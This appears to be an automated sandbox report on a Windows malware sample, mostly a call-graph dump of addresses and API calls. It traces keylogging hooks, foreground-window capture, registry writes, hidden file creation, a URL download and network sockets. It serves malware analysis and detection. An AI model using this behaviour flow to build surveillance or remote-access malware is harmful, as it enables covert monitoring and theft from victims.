48304->48305 48306 4025a7 48304->48306 48318 402a34 22 API calls 48305->48318 48320 4028e8 28 API calls 48306->48320 48309 40259b 48319 4029da 22 API calls 48309->48319 48311 4025a5 48311->48300 48312->48300 48314 402890 48313->48314 48315 402898 48314->48315 48321 402ca3 22 API calls 48314->48321 48315->48304 48318->48309 48319->48311 48320->48311 48323 4020e7 48322->48323 48324 4023ce 11 API calls 48323->48324 48325 4020f2 48324->48325 48325->47890 48331 40423a 48326->48331 48329->47890 48330->47900 48332 404243 48331->48332 48333 4023ce 11 API calls 48332->48333 48334 40424e 48333->48334 48335 402569 28 API calls 48334->48335 48336 4041b5 48335->48336 48336->47890 48337->47904 48338->47909 48339->47907 48343 4032aa 48341->48343 48342 4032c9 48342->47920 48343->48342 48345 4028e8 28 API calls 48343->48345 48345->48342 48347 4051fb 48346->48347 48356 405274 48347->48356 48349 405208 48349->47923 48351 402061 48350->48351 48352 4023ce 11 API calls 48351->48352 48353 40207b 48352->48353 48380 40267a 48353->48380 48357 405282 48356->48357 48358 405288 48357->48358 48359 40529e 48357->48359 48367 4025f0 48358->48367 48361 4052f5 48359->48361 48362 4052b6 48359->48362 48377 4028a4 22 API calls 48361->48377 48366 40529c 48362->48366 48376 4028e8 28 API calls 48362->48376 48366->48349 48368 402888 22 API calls 48367->48368 48369 402602 48368->48369 48370 402672 48369->48370 48372 402629 48369->48372 48379 4028a4 22 API calls 48370->48379 48375 40263b 48372->48375 48378 4028e8 28 API calls 48372->48378 48375->48366 48376->48366 48378->48375 48381 40268b 48380->48381 48382 4023ce 11 API calls 48381->48382 48383 40208d 48382->48383 48383->47926 48384->47928 48385->47939 48388 41bfc4 GetCurrentProcess 48387->48388 48389 41b2d1 48387->48389 48388->48389 48390 4135a6 RegOpenKeyExA 48389->48390 48391 4135d4 RegQueryValueExA RegCloseKey 48390->48391 48392 4135fe 48390->48392 48391->48392 48393 402093 28 API calls 48392->48393 48394 413613 48393->48394 48394->47950 48395->47961 48397 40b90c 48396->48397 48402 402252 48397->48402 48399 40b917 48406 40b92c 48399->48406 48401 40b926 48401->47969 48403 40225c 48402->48403 48404 4022ac 48402->48404 48403->48404 48413 402779 11 API calls std::_Deallocate 48403->48413 48404->48399 48407 40b966 48406->48407 48408 40b938 48406->48408 48425 4028a4 22 API calls 48407->48425 48414 4027e6 48408->48414 48412 40b942 48412->48401 48413->48404 48415 4027ef 48414->48415 48416 402851 48415->48416 48417 4027f9 48415->48417 48427 4028a4 22 API calls 48416->48427 48420 402802 48417->48420 48421 402815 48417->48421 48426 402aea 28 API calls __EH_prolog 48420->48426 48423 402813 48421->48423 48424 402252 11 API calls 48421->48424 48423->48412 48424->48423 48426->48423 48428->47978 48430 402347 48429->48430 48431 402252 11 API calls 48430->48431 48432 4023c7 48431->48432 48432->47978 48434 4024f9 48433->48434 48435 40250a 28 API calls 48434->48435 48436 4020b1 48435->48436 48436->47482 48453 43ba0a 48437->48453 48439 43ae50 48440 43a7b7 __cftof 36 API calls 48439->48440 48445 43ae5c 48440->48445 48441 43ae15 48441->48439 48442 43ae2a 48441->48442 48452 43ae2f __cftof 48441->48452 48458 4405dd 20 API calls __dosmaperr 48442->48458 48446 43ae8b 48445->48446 48459 43ba4f 40 API calls __Toupper 48445->48459 48449 43aef7 48446->48449 48460 43b9b6 20 API calls 2 library calls 48446->48460 48461 43b9b6 20 API calls 2 library calls 48449->48461 48450 43afbe _strftime 48450->48452 48462 4405dd 20 API calls __dosmaperr 48450->48462 48452->48007 48454 43ba22 48453->48454 48455 43ba0f 48453->48455 48454->48441 48463 4405dd 20 API calls __dosmaperr 48455->48463 48457 43ba14 __cftof 48457->48441 48458->48452 48459->48445 48460->48449 48461->48450 48462->48452 48463->48457 48470 401fb0 48464->48470 48466 402f1e 48467 402055 11 API calls 48466->48467 48468 402f2d 48467->48468 48468->48021 48469->48024 48471 4025f0 28 API calls 48470->48471 48472 401fbd 48471->48472 48472->48466 48474 40a127 48473->48474 48475 413549 3 API calls 48474->48475 48476 40a12e 48475->48476 48477 40a142 48476->48477 48478 40a15c 48476->48478 48479 409e9b 48477->48479 48480 40a147 48477->48480 48494 40905c 48478->48494 48479->47533 48482 40905c 28 API calls 48480->48482 48484 40a155 48482->48484 48522 40a22d 29 API calls 48484->48522 48487 40a15a 48487->48479 48488->48049 48670 403222 48489->48670 48491 403022 48674 403262 48491->48674 48495 409072 48494->48495 48496 402252 11 API calls 48495->48496 48497 40908c 48496->48497 48523 404267 48497->48523 48499 40909a 48500 40a179 48499->48500 48535 40b8ec 48500->48535 48503 40a1a2 48506 402093 28 API calls 48503->48506 48504 40a1ca 48505 402093 28 API calls 48504->48505 48508 40a1d5 48505->48508 48507 40a1ac 48506->48507 48509 41bc5e 28 API calls 48507->48509 48510 402093 28 API calls 48508->48510 48511 40a1ba 48509->48511 48512 40a1e4 48510->48512 48539 40b164 31 API calls _Yarn 48511->48539 48514 41b4ef 80 API calls 48512->48514 48516 40a1e9 CreateThread 48514->48516 48515 40a1c1 48517 401fd8 11 API calls 48515->48517 48518 40a210 CreateThread 48516->48518 48519 40a204 CreateThread 48516->48519 48547 40a27d 48516->48547 48517->48504 48520 401f09 11 API calls 48518->48520 48544 40a289 48518->48544 48519->48518 48541 40a267 48519->48541 48521 40a224 48520->48521 48521->48479 48522->48487 48669 40a273 163 API calls 48522->48669 48524 402888 22 API calls 48523->48524 48525 40427b 48524->48525 48526 404290 48525->48526 48527 4042a5 48525->48527 48533 4042df 22 API calls 48526->48533 48528 4027e6 28 API calls 48527->48528 48530 4042a3 48528->48530 48530->48499 48531 404299 48534 402c48 22 API calls 48531->48534 48533->48531 48534->48530 48536 40b8f5 48535->48536 48537 40a197 48535->48537 48540 40b96c 28 API calls 48536->48540 48537->48503 48537->48504 48539->48515 48540->48537 48550 40a2b8 48541->48550 48580 40acd6 48544->48580 48622 40a726 48547->48622 48551 40a2d1 GetModuleHandleA SetWindowsHookExA 48550->48551 48552 40a333 GetMessageA 48550->48552 48551->48552 48554 40a2ed GetLastError 48551->48554 48553 40a345 TranslateMessage DispatchMessageA 48552->48553 48564 40a270 48552->48564 48553->48552 48553->48564 48565 41bb8e 48554->48565 48571 441e81 48565->48571 48568 402093 28 API calls 48569 40a2fe 48568->48569 48570 4052fd 28 API calls 48569->48570 48572 441e8d 48571->48572 48575 441c7d 48572->48575 48574 41bbb2 48574->48568 48576 441c94 48575->48576 48578 441ccb __cftof 48576->48578 48579 4405dd 20 API calls __dosmaperr 48576->48579 48578->48574 48579->48578 48609 40ace4 48580->48609 48581 40a292 48582 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW 48583 40b904 28 API calls 48582->48583 48583->48609 48588 41bae6 GetTickCount 48588->48609 48589 40ad84 GetWindowTextW 48589->48609 48591 40b8ec 28 API calls 48591->48609 48592 40aedc 48593 401f09 11 API calls 48592->48593 48593->48581 48594 40ae49 Sleep 48594->48609 48595 441e81 20 API calls 48595->48609 48597 402093 28 API calls 48597->48609 48598 40add1 48600 40905c 28 API calls 48598->48600 48598->48609 48618 40b164 31 API calls _Yarn 48598->48618 48600->48598 48602 403014 28 API calls 48602->48609 48603 406383 28 API calls 48603->48609 48605 40a636 12 API calls 48605->48609 48606 41bc5e 28 API calls 48606->48609 48607 401f09 11 API calls 48607->48609 48608 401fd8 11 API calls 48608->48609 48609->48581 48609->48582 48609->48588 48609->48589 48609->48591 48609->48592 48609->48594 48609->48595 48609->48597 48609->48598 48609->48602 48609->48603 48609->48605 48609->48606 48609->48607 48609->48608 48610 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 48609->48610 48611 401f86 48609->48611 48615 434770 23 API calls __onexit 48609->48615 48616 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 48609->48616 48617 409044 28 API calls 48609->48617 48619 40b97c 28 API calls 48609->48619 48620 40b748 40 API calls 2 library calls 48609->48620 48621 4052fd 28 API calls 48609->48621 48612 401f8e 48611->48612 48613 402252 11 API calls 48612->48613 48614 401f99 48613->48614 48614->48609 48615->48609 48616->48609 48617->48609 48618->48598 48619->48609 48620->48609 48623 40a73b Sleep 48622->48623 48643 40a675 48623->48643 48625 40a286 48626 40a77b CreateDirectoryW 48630 40a74d 48626->48630 48627 40a78c GetFileAttributesW 48627->48630 48628 40a7a3 SetFileAttributesW 48628->48630 48630->48623 48630->48625 48630->48627 48630->48628 48632 401e65 22 API calls 48630->48632 48641 40a76f 48630->48641 48656 41c3f1 48630->48656 48631 40a81d PathFileExistsW 48631->48641 48632->48630 48633 4020df 11 API calls 48633->48641 48634 4020b7 28 API calls 48634->48641 48636 40a926 SetFileAttributesW 48636->48630 48637 406dd8 28 API calls 48637->48641 48638 401fe2 28 API calls 48638->48641 48639 401fd8 11 API calls 48639->48641 48641->48626 48641->48631 48641->48633 48641->48634 48641->48636 48641->48637 48641->48638 48641->48639 48642 401fd8 11 API calls 48641->48642 48666 41c485 32 API calls 48641->48666 48667 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48641->48667 48642->48630 48644 40a722 48643->48644 48646 40a68b 48643->48646 48644->48630 48645 40a6aa CreateFileW 48645->48646 48647 40a6b8 GetFileSize 48645->48647 48646->48645 48648 40a6ed CloseHandle 48646->48648 48649 40a6ff 48646->48649 48650 40a6e2 Sleep 48646->48650 48651 40a6db 48646->48651 48647->48646 48647->48648 48648->48646 48649->48644 48653 40905c 28 API calls 48649->48653 48650->48648 48668 40b0dc 84 API calls 48651->48668 48654 40a71b 48653->48654 48655 40a179 124 API calls 48654->48655 48655->48644 48657 41c404 CreateFileW 48656->48657 48659 41c441 48657->48659 48660 41c43d 48657->48660 48661 41c461 WriteFile 48659->48661 48662 41c448 SetFilePointer 48659->48662 48660->48630 48664 41c474 48661->48664 48665 41c476 CloseHandle 48661->48665 48662->48661 48663 41c458 CloseHandle 48662->48663 48663->48660 48664->48665 48665->48660 48666->48641 48667->48641 48668->48650 48671 40322e 48670->48671 48680 403618 48671->48680 48673 40323b 48673->48491 48675 40326e 48674->48675 48676 402252 11 API calls 48675->48676 48677 403288 48676->48677 48678 402336 11 API calls 48677->48678 48679 403031 48678->48679 48679->48054 48681 403626 48680->48681 48682 403644 48681->48682 48683 40362c 48681->48683 48685 40369e 48682->48685 48687 40365c 48682->48687 48691 4036a6 28 API calls 48683->48691 48692 4028a4 22 API calls 48685->48692 48689 4027e6 28 API calls 48687->48689 48690 403642 48687->48690 48689->48690 48690->48673 48691->48690 48694 404186 48693->48694 48695 402252 11 API calls 48694->48695 48696 404191 48695->48696 48704 4041bc 48696->48704 48699 4042fc 48715 404353 48699->48715 48701 40430a 48702 403262 11 API calls 48701->48702 48703 404319 48702->48703 48703->48063 48705 4041c8 48704->48705 48708 4041d9 48705->48708 48707 40419c 48707->48699 48709 4041e9 48708->48709 48710 404206 48709->48710 48711 4041ef 48709->48711 48712 4027e6 28 API calls 48710->48712 48713 404267 28 API calls 48711->48713 48714 404204 48712->48714 48713->48714 48714->48707 48716 40435f 48715->48716 48719 404371 48716->48719 48718 40436d 48718->48701 48720 40437f 48719->48720 48721 404385 48720->48721 48722 40439e 48720->48722 48785 4034e6 28 API calls 48721->48785 48723 402888 22 API calls 48722->48723 48724 4043a6 48723->48724 48726 404419 48724->48726 48727 4043bf 48724->48727 48786 4028a4 22 API calls 48726->48786 48730 4027e6 28 API calls 48727->48730 48738 40439c 48727->48738 48730->48738 48738->48718 48785->48738 48793 43aa9a 48787->48793 48791 4138b9 48790->48791 48792 41388f RegSetValueExA RegCloseKey 48790->48792 48791->48082 48792->48791 48796 43aa1b 48793->48796 48795 40170d 48795->48080 48797 43aa2a 48796->48797 48798 43aa3e 48796->48798 48809 4405dd 20 API calls __dosmaperr 48797->48809 48801 43aa2f __alldvrm __cftof 48798->48801 48802 448957 48798->48802 48801->48795 48803 4484ca __Toupper 5 API calls 48802->48803 48804 44897e 48803->48804 48805 448996 GetSystemTimeAsFileTime 48804->48805 48806 44898a 48804->48806 48805->48806 48807 434fcb _ValidateLocalCookies 5 API calls 48806->48807 48808 4489a7 48807->48808 48808->48801 48809->48801 48813 41b8f9 _Yarn ___scrt_get_show_window_mode 48810->48813 48811 402093 28 API calls 48812 414f49 48811->48812 48812->48088 48813->48811 48814->48105 48816 414f02 getaddrinfo WSASetLastError 48815->48816 48817 414ef8 48815->48817 48816->48157 48955 414d86 48817->48955 48821 404846 socket 48820->48821 48822 404839 48820->48822 48823 404860 CreateEventW 48821->48823 48824 404842 48821->48824 48994 40489e WSAStartup 48822->48994 48823->48157 48824->48157 48826 40483e 48826->48821 48826->48824 48828 404f65 48827->48828 48829 404fea 48827->48829 48830 404f6e 48828->48830 48831 404fc0 CreateEventA CreateThread 48828->48831 48832 404f7d GetLocalTime 48828->48832 48829->48157 48830->48831 48831->48829 48996 405150 48831->48996 48833 41bb8e 28 API calls 48832->48833 48834 404f91 48833->48834 48995 4052fd 28 API calls 48834->48995 48843 404a1b 48842->48843 48844 4048ee 48842->48844 48845 40497e 48843->48845 48846 404a21 WSAGetLastError 48843->48846 48844->48845 48847 404923 48844->48847 48849 40531e 28 API calls 48844->48849 48845->48157 48846->48845 48848 404a31 48846->48848 49000 420c60 27 API calls 48847->49000 48850 404932 48848->48850 48851 404a36 48848->48851 48854 40490f 48849->48854 48857 402093 28 API calls 48850->48857 49005 41cae1 30 API calls 48851->49005 48853 40492b 48853->48850 48856 404941 48853->48856 48858 402093 28 API calls 48854->48858 48866 404950 48856->48866 48867 404987 48856->48867 48860 404a80 48857->48860 48861 40491e 48858->48861 48859 404a40 49006 4052fd 28 API calls 48859->49006 48863 402093 28 API calls 48860->48863 48864 41b4ef 80 API calls 48861->48864 48868 404a8f 48863->48868 48864->48847 48872 402093 28 API calls 48866->48872 49002 421a40 54 API calls 48867->49002 48873 41b4ef 80 API calls 48868->48873 48876 40495f 48872->48876 48873->48845 48874 40498f 48877 4049c4 48874->48877 48878 404994 48874->48878 48880 402093 28 API calls 48876->48880 49004 420e06 28 API calls 48877->49004 48881 402093 28 API calls 48878->48881 48883 40496e 48880->48883 48885 4049a3 48881->48885 48886 41b4ef 80 API calls 48883->48886 48888 402093 28 API calls 48885->48888 48889 404973 48886->48889 48887 4049cc 48890 4049f9 CreateEventW CreateEventW 48887->48890 48892 402093 28 API calls 48887->48892 48891 4049b2 48888->48891 49001 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48889->49001 48890->48845 48894 41b4ef 80 API calls 48891->48894 48893 4049e2 48892->48893 48896 402093 28 API calls 48893->48896 48897 4049b7 48894->48897 48898 4049f1 48896->48898 49003 4210b2 52 API calls 48897->49003 48900 41b4ef 80 API calls 48898->48900 48901 4049f6 48900->48901 48901->48890 49007 41b7b6 GlobalMemoryStatusEx 48902->49007 48904 41b7f5 48904->48157 49008 414580 48905->49008 48909 40dda5 48908->48909 48910 4134ff 3 API calls 48909->48910 48912 40ddac 48910->48912 48911 40ddc4 48911->48157 48912->48911 48913 413549 3 API calls 48912->48913 48913->48911 48915 4020b7 28 API calls 48914->48915 48916 41bc57 48915->48916 48916->48157 48918 41bd2b 48917->48918 48919 4020b7 28 API calls 48918->48919 48920 41bd3d 48919->48920 48920->48157 48922 41bafc GetTickCount 48921->48922 48922->48174 48924 436e90 ___scrt_get_show_window_mode 48923->48924 48925 41bab5 GetForegroundWindow GetWindowTextW 48924->48925 48926 40417e 28 API calls 48925->48926 48927 41badf 48926->48927 48927->48174 48928->48174 48929->48174 48931 4020df 11 API calls 48930->48931 48932 404c27 48931->48932 48933 4020df 11 API calls 48932->48933 48945 404c30 48933->48945 48934 43bd51 _Yarn 21 API calls 48934->48945 48936 404c96 48938 404ca1 48936->48938 48936->48945 48937 4020b7 28 API calls 48937->48945 49050 404e26 99 API calls 48938->49050 48939 401fe2 28 API calls 48939->48945 48941 404ca8 48943 401fd8 11 API calls 48941->48943 48942 401fd8 11 API calls 48942->48945 48944 404cb1 48943->48944 48946 401fd8 11 API calls 48944->48946 48945->48934 48945->48936 48945->48937 48945->48939 48945->48942 49037 404cc3 48945->49037 49049 404b96 57 API calls 48945->49049 48947 404cba 48946->48947 48947->48134 48949->48157 48950->48134 48952->48174 48953->48134 48954->48134 48956 414dc8 GetSystemDirectoryA 48955->48956 48973 414ecf 48955->48973 48957 414de3 48956->48957 48956->48973 48976 441a3e 48957->48976 48959 414dff 48983 441a98 48959->48983 48961 414e0f LoadLibraryA 48962 414e31 GetProcAddress 48961->48962 48963 414e42 48961->48963 48962->48963 48964 414e3d FreeLibrary 48962->48964 48965 441a3e ___std_exception_copy 20 API calls 48963->48965 48974 414e93 48963->48974 48964->48963 48966 414e5e 48965->48966 48967 441a98 20 API calls 48966->48967 48970 414e6e LoadLibraryA 48967->48970 48968 414e99 GetProcAddress 48969 414eb4 FreeLibrary 48968->48969 48968->48974 48971 414eb2 48969->48971 48972 414e82 GetProcAddress 48970->48972 48970->48973 48971->48973 48972->48974 48975 414e8e FreeLibrary 48972->48975 48973->48816 48974->48968 48974->48971 48974->48973 48975->48974 48977 441a59 48976->48977 48978 441a4b 48976->48978 48990 4405dd 20 API calls __dosmaperr 48977->48990 48978->48977 48981 441a70 48978->48981 48980 441a61 __cftof 48980->48959 48981->48980 48991 4405dd 20 API calls __dosmaperr 48981->48991 48984 441ab4 48983->48984 48986 441aa6 48983->48986 48992 4405dd 20 API calls __dosmaperr 48984->48992 48986->48984 48987 441add 48986->48987 48989 441abc __cftof 48987->48989 48993 4405dd 20 API calls __dosmaperr 48987->48993 48989->48961 48990->48980 48991->48980 48992->48989 48993->48989 48994->48826 48999 40515c 102 API calls 48996->48999 48998 405159 48999->48998 49000->48853 49001->48845 49002->48874 49003->48889 49004->48887 49005->48859 49007->48904 49011 414553 49008->49011 49012 414568 ___scrt_initialize_default_local_stdio_options 49011->49012 49015 43f79d 49012->49015 49018 43c4f0 49015->49018 49019 43c530 49018->49019 49020 43c518 49018->49020 49019->49020 49022 43c538 49019->49022 49033 4405dd 20 API calls __dosmaperr 49020->49033 49023 43a7b7 __cftof 36 API calls 49022->49023 49024 43c548 49023->49024 49034 43cc76 20 API calls 2 library calls 49024->49034 49025 43c51d __cftof 49027 434fcb _ValidateLocalCookies 5 API calls 49025->49027 49029 414576 49027->49029 49028 43c5c0 49035 43d2e4 51 API calls 3 library calls 49028->49035 49029->48157 49032 43c5cb 49036 43cce0 20 API calls _free 49032->49036 49033->49025 49034->49028 49035->49032 49036->49025 49038 4020df 11 API calls 49037->49038 49047 404cde 49038->49047 49039 404e13 49040 401fd8 11 API calls 49039->49040 49041 404e1c 49040->49041 49041->48936 49042 4041a2 28 API calls 49042->49047 49043 401fe2 28 API calls 49043->49047 49044 401fc0 28 API calls 49046 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 49044->49046 49045 4020f6 28 API calls 49045->49047 49046->49047 49051 415aea 49046->49051 49047->49039 49047->49042 49047->49043 49047->49044 49047->49045 49048 401fd8 11 API calls 49047->49048 49048->49047 49049->48945 49050->48941 49052 4020f6 28 API calls 49051->49052 49053 415b0c SetEvent 49052->49053 49054 415b21 49053->49054 49055 4041a2 28 API calls 49054->49055 49056 415b3b 49055->49056 49057 4020f6 28 API calls 49056->49057 49058 415b4b 49057->49058 49059 4020f6 28 API calls 49058->49059 49060 415b5d 49059->49060 49061 41be1b 28 API calls 49060->49061 49062 415b66 49061->49062 49063 417089 49062->49063 49064 415b86 GetTickCount 49062->49064 49065 415d2f 49062->49065 49066 401e8d 11 API calls 49063->49066 49067 41bb8e 28 API calls 49064->49067 49065->49063 49128 415ce5 49065->49128 49068 417092 49066->49068 49069 415b97 49067->49069 49071 401fd8 11 API calls 49068->49071 49072 41bae6 GetTickCount 49069->49072 49073 41709e 49071->49073 49074 415ba3 49072->49074 49075 401fd8 11 API calls 49073->49075 49076 41bb8e 28 API calls 49074->49076 49077 4170aa 49075->49077 49078 415bae 49076->49078 49079 41ba96 30 API calls 49078->49079 49080 415bbc 49079->49080 49081 41bd1e 28 API calls 49080->49081 49082 415bca 49081->49082 49083 401e65 22 API calls 49082->49083 49084 415bd8 49083->49084 49130 402f31 28 API calls 49084->49130 49086 415be6 49131 402ea1 28 API calls 49086->49131 49088 415bf5 49089 402f10 28 API calls 49088->49089 49090 415c04 49089->49090 49132 402ea1 28 API calls 49090->49132 49092 415c13 49093 402f10 28 API calls 49092->49093 49094 415c1f 49093->49094 49133 402ea1 28 API calls 49094->49133 49096 415c29 49134 404aa1 61 API calls _Yarn 49096->49134 49098 415c38 49099 401fd8 11 API calls 49098->49099 49100 415c41 49099->49100 49101 401fd8 11 API calls 49100->49101 49102 415c4d 49101->49102 49103 401fd8 11 API calls 49102->49103 49104 415c59 49103->49104 49105 401fd8 11 API calls 49104->49105 49106 415c65 49105->49106 49107 401fd8 11 API calls 49106->49107 49108 415c71 49107->49108 49109 401fd8 11 API calls 49108->49109 49110 415c7d 49109->49110 49111 401f09 11 API calls 49110->49111 49112 415c86 49111->49112 49113 401fd8 11 API calls 49112->49113 49114 415c8f 49113->49114 49115 401fd8 11 API calls 49114->49115 49116 415c98 49115->49116 49117 401e65 22 API calls 49116->49117 49118 415ca3 49117->49118 49119 43baac _strftime 40 API calls 49118->49119 49120 415cb0 49119->49120 49121 415cb5 49120->49121 49122 415cdb 49120->49122 49124 415cc3 49121->49124 49125 415cce 49121->49125 49123 401e65 22 API calls 49122->49123 49123->49128 49135 404ff4 82 API calls 49124->49135 49127 404f51 105 API calls 49125->49127 49129 415cc9 49127->49129 49128->49063 49136 4050e4 84 API calls 49128->49136 49129->49063 49130->49086 49131->49088 49132->49092 49133->49096 49134->49098 49135->49129 49136->49129 49138->48207 49139->48234 49140->48233 49141->48222 49142->48226 49143->48232 49146 40f7c2 49144->49146 49145 413549 3 API calls 49145->49146 49146->49145 49147 40f866 49146->49147 49149 40f856 Sleep 49146->49149 49166 40f7f4 49146->49166 49150 40905c 28 API calls 49147->49150 49148 40905c 28 API calls 49148->49166 49149->49146 49151 40f871 49150->49151 49154 41bc5e 28 API calls 49151->49154 49153 41bc5e 28 API calls 49153->49166 49155 40f87d 49154->49155 49179 413814 14 API calls 49155->49179 49158 401f09 11 API calls 49158->49166 49159 40f890 49160 401f09 11 API calls 49159->49160 49162 40f89c 49160->49162 49161 402093 28 API calls 49161->49166 49163 402093 28 API calls 49162->49163 49164 40f8ad 49163->49164 49167 41376f 14 API calls 49164->49167 49165 41376f 14 API calls 49165->49166 49166->49148 49166->49149 49166->49153 49166->49158 49166->49161 49166->49165 49177 40d096 112 API calls ___scrt_get_show_window_mode 49166->49177 49178 413814 14 API calls 49166->49178 49168 40f8c0 49167->49168 49180 412850 TerminateProcess WaitForSingleObject 49168->49180 49170 40f8c8 ExitProcess 49181 4127ee 62 API calls 49174->49181 49178->49166 49179->49159 49180->49170 49182 4269e6 49183 4269fb 49182->49183 49194 426a8d 49182->49194 49184 426b44 49183->49184 49185 426abd 49183->49185 49186 426b1d 49183->49186 49189 426af2 49183->49189 49190 426a48 49183->49190 49183->49194 49196 426a7d 49183->49196 49210 424edd 49 API calls _Yarn 49183->49210 49184->49194 49215 426155 28 API calls 49184->49215 49185->49189 49185->49194 49213 41fb6c 52 API calls 49185->49213 49186->49184 49186->49194 49198 425ae1 49186->49198 49189->49186 49214 4256f0 21 API calls 49189->49214 49190->49194 49190->49196 49211 41fb6c 52 API calls 49190->49211 49196->49185 49196->49194 49212 424edd 49 API calls _Yarn 49196->49212 49199 425b00 ___scrt_get_show_window_mode 49198->49199 49201 425b0f 49199->49201 49204 425b34 49199->49204 49216 41ebbb 21 API calls 49199->49216 49201->49204 49209 425b14 49201->49209 49217 4205d8 46 API calls 49201->49217 49204->49184 49205 425b1d 49205->49204 49220 424d05 21 API calls 2 library calls 49205->49220 49207 425bb7 49207->49204 49218 432ec4 21 API calls _Yarn 49207->49218 49209->49204 49209->49205 49219 41da5f 49 API calls 49209->49219 49210->49190 49211->49190 49212->49185 49213->49185 49214->49186 49215->49194 49216->49201 49217->49207 49218->49209 49219->49205 49220->49204 49221 434875 49226 434b47 SetUnhandledExceptionFilter 49221->49226 49223 43487a pre_c_initialization 49227 44554b 20 API calls 2 library calls 49223->49227 49225 434885 49226->49223 49227->49225 49228 415d06 49243 41b380 49228->49243 49230 415d0f 49231 4020f6 28 API calls 49230->49231 49232 415d1e 49231->49232 49254 404aa1 61 API calls _Yarn 49232->49254 49234 415d2a 49235 417089 49234->49235 49236 401fd8 11 API calls 49234->49236 49237 401e8d 11 API calls 49235->49237 49236->49235 49238 417092 49237->49238 49239 401fd8 11 API calls 49238->49239 49240 41709e 49239->49240 49241 401fd8 11 API calls 49240->49241 49242 4170aa 49241->49242 49244 4020df 11 API calls 49243->49244 49245 41b38e 49244->49245 49246 43bd51 _Yarn 21 API calls 49245->49246 49247 41b39e InternetOpenW InternetOpenUrlW 49246->49247 49248 41b3c5 InternetReadFile 49247->49248 49252 41b3e8 49248->49252 49249 4020b7 28 API calls 49249->49252 49250 41b415 InternetCloseHandle InternetCloseHandle 49251 41b427 49250->49251 49251->49230 49252->49248 49252->49249 49252->49250 49253 401fd8 11 API calls 49252->49253 49253->49252 49254->49234 49255 426c4b 49260 426cc8 send 49255->49260 49261 44831e 49269 448710 49261->49269 49264 448332 49266 44833a 49267 448347 49266->49267 49277 44834a 11 API calls 49266->49277 49270 4484ca __Toupper 5 API calls 49269->49270 49271 448737 49270->49271 49272 44874f TlsAlloc 49271->49272 49273 448740 49271->49273 49272->49273 49274 434fcb _ValidateLocalCookies 5 API calls 49273->49274 49275 448328 49274->49275 49275->49264 49276 448299 20 API calls 3 library calls 49275->49276 49276->49266 49277->49264 49278 43be58 49280 43be64 _swprintf ___FrameUnwindToState 49278->49280 49279 43be72 49294 4405dd 20 API calls __dosmaperr 49279->49294 49280->49279 49282 43be9c 49280->49282 49289 445888 EnterCriticalSection 49282->49289 49284 43be77 __cftof ___FrameUnwindToState 49285 43bea7 49290 43bf48 49285->49290 49289->49285 49291 43bf56 49290->49291 49293 43beb2 49291->49293 49296 44976c 37 API calls 2 library calls 49291->49296 49295 43becf LeaveCriticalSection std::_Lockit::~_Lockit 49293->49295 49294->49284 49295->49284 49296->49291 49297 41dfbd 49298 41dfd2 _Yarn ___scrt_get_show_window_mode 49297->49298 49310 41e1d5 49298->49310 49316 432ec4 21 API calls _Yarn 49298->49316 49301 41e1e6 49302 41e189 49301->49302 49312 432ec4 21 API calls _Yarn 49301->49312 49304 41e182 ___scrt_get_show_window_mode 49304->49302 49317 432ec4 21 API calls _Yarn 49304->49317 49306 41e21f ___scrt_get_show_window_mode 49306->49302 49313 43354a 49306->49313 49308 41e1af ___scrt_get_show_window_mode 49308->49302 49318 432ec4 21 API calls _Yarn 49308->49318 49310->49302 49311 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 49310->49311 49311->49301 49312->49306 49319 433469 49313->49319 49315 433552 49315->49302 49316->49304 49317->49308 49318->49310 49320 433482 49319->49320 49321 433478 49319->49321 49320->49321 49325 432ec4 21 API calls _Yarn 49320->49325 49321->49315 49323 4334a3 49323->49321 49326 433837 CryptAcquireContextA 49323->49326 49325->49323 49327 433858 CryptGenRandom 49326->49327 49328 433853 49326->49328 49327->49328 49329 43386d CryptReleaseContext 49327->49329 49328->49321 49329->49328 49330 426bdc 49336 426cb1 recv 49330->49336

                                Executed Functions

                                Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                • LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                • LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                • LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                • LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
